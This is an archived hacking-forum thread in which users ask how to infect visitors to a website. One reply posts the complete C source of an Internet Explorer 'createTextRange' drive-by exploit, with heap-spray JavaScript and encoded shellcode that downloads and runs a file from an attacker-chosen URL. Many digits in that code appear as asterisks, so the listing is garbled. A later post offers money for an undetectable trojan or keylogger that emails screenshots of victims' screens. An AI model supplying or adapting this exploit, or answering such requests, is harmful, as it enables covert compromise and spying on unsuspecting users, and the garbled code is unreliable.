PDA

View Full Version : Binding server into html



jokr004
03-26-2006, 05:41 PM
Ok, does anyone know where I can find a program that will decode an exe into html code so that when the site is visited, the visitor is infected? I think it has somthing to do with an .EML bug. I read about this a while ago and could really really use this right now.

fabioejp
03-26-2006, 11:20 PM
Ok, does anyone know where I can find a program that will decode an exe into html code so that when the site is visited, the visitor is infected? I think it has somthing to do with an .EML bug. I read about this a while ago and could really really use this right now.

??????????????????????????????????????????????????
HTML > EXE

I think you are looking for something with the taste of "Xploit"

carlo
03-27-2006, 12:36 PM
* words. Remote Code Execution.

Ezekiel
04-09-2006, 05:19 AM
Java required, right?

Remote code execution can be in anything, not just java. I think what he was meaning from remote code execution was remote code execution from an exploit, not remote code execution as in running a java applet. In reply to the first post, there is no way to just embed executable code into a html file, and even java applets are limited, and run in a "sandbox", without any access to local data. The only way to execute code from just an html file is by using exploits. Here is the latest version of the IE exploit, (btw it's not php code, it's c code).


/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-0*-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@***mail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* ****** to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/

/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special *0x goes to him.
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x800
#define FILE_NAME "index.htm"

char body*[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"\tvar heapSprayToAddress = 0x*c0*74c2;\r\n\r\n"
"\tvar payLoadCode = unescape(\"%u*0*0%u*0*0%u*0*0\" +\r\n"
"\t\"%uCCE*%u0000%u5F00%u56E8%u0000%u8*00%u50C*%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC***%uB*66%u6E6F%u685*%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u*668%u2F*A%uE870%u0046%u0000%uC***%u5*5*%u*78D%u8D56%u0877\" +\r\n"
"\t\"%u5*56%uD0FF%u685*%uFE*8%u0E8A%u2DE8%u0000%u5*00%uFF57%u**D0\" +\r\n"
"\t\"%u4*C*%u*0*0%u685*%uD87E%u7*E2%u**E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u*0A*%u0000%u8B00%u0C40%u708B%uAD*C%u688B%u8*08%u5EE8%uC*5D\" +\r\n"
"\t\"%u555*%u5756%u6C8B%u*824%u458B%u8B*C%u0554%u0*78%u8BEA%u*84A\" +\r\n"
"\t\"%u5A8B%u0*20%uE*EB%u4**5%u*48B%u0*8B%u**EE%uFCFF%uC0**%u*8AC\" +\r\n"
"\t\"%u74E0%uC*07%u0DCF%uC70*%uF2EB%u7C*B%u*424%uE*75%u5A8B%u0*24\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u*C5A%uEB0*%u048B%u0*8B%uE*E8%u0002%u0000\" +\r\n"
"\t\"%uC0**%uEA8*%u5E5F%u5B5D%uE8C*%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";

char body2[] =
"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n"
"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x*8);\r\n\r\n"
"\tvar spraySlide = unescape(\"%u*0*0%u*0*0\");\r\n"
"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
"\tmemory = new Array();\r\n\r\n"
"\tfor (i=0;i<heapBlocks;i++)\r\n"
"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n"
"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"
"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
"\t\treturn spraySlide;\r\n"
"\t}\r\n\r\n</script>";


int main(int argc,char *argv[])
{
if (argc < 2)
{
printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
printf("\nCoded by ATmaCA (atmaca[at]***mail.com)\n");
printf("\nUsage:\n");
printf("ie_exp <WebUrl>\n");

return 0;
}

FILE *File;
char *pszBuffer;
char *web = argv[*];
char *pu = "%u";
char u_t[5];
char *utf*6 = (char*)malloc(strlen(web)*5);

if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(*);
}

pszBuffer = (char*)malloc(BUF_LEN);
memcpy(pszBuffer,body*,sizeof(body*)-*);

memset(utf*6,'\0',strlen(web)*5);
for (unsigned int i=0;i<strlen(web);i=i+2)
{
sprintf(u_t,"%s%.2x%.2x", pu, web[i+*], web[i]);
strcat(utf*6,u_t);
}

strcat(pszBuffer,utf*6);
strcat(pszBuffer,"%u0000\");");
strcat(pszBuffer,body2);

fwrite(pszBuffer, BUF_LEN, *,File);
fclose(File);

printf("\n\n" FILE_NAME " has been created in the current directory.\n");
return *;
}

Jadamoks
04-20-2006, 01:57 PM
im looking for undetectable trojan that can be ran in the background of website like remote code execution i will pay someone a good ammount if they can make this all i need it mainly for is to see screenshots of victims pc maybe that can be something like a keylogger that sends screenshots to email